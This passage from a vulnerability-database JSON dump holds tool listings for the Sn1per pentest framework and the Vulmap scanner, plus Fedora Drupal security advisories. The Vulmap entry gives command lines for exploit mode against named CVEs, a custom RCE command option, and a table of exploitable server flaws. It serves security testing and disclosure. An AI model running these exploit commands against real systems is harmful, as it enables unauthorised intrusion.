Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": 
"http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:02:21", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. 
-f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command. Commands other than \"netstat -an\" and \"id\" can affect program judgment. default is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some Linux systems do not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilities List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n 
+-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache 
Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | 
RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", 
"CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:16:35", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal7-7.59-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-10T19:16:35", "id": "FEDORA:9FC6E6070D50", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-09T21:27:49", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.4.8-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-05-09T21:27:49", "id": "FEDORA:5C39A60311F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:13:53", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal8-8.4.8-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-05-10T19:13:53", "id": "FEDORA:17401605E206", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-03T01:39:06", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.2-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-12-03T01:39:06", "id": "FEDORA:4B26D6048172", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-07T20:06:44", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.10-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2019-03-07T20:06:44", "id": "FEDORA:7595560DCBCA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-24T04:02:47", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal8-8.4.6-3.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "modified": "2018-04-24T04:02:47", "id": "FEDORA:9DFEE60469B4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XWSND764JDPO7QHXKOFVZCECOMLR3N6L/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:11:07", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: drupal7-7.59-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-10T19:11:07", "id": "FEDORA:45D79604B015", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-27T04:14:07", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.4.6-3.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "modified": "2018-04-27T04:14:07", "id": "FEDORA:D89B16076A01", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XXVDKJCOAT4CADPHTJSB5HZN6IISPDTE/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-02T01:37:00", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.13-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861", "CVE-2019-6341"], "modified": "2019-04-02T01:37:00", "id": "FEDORA:2C56E6076005", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": 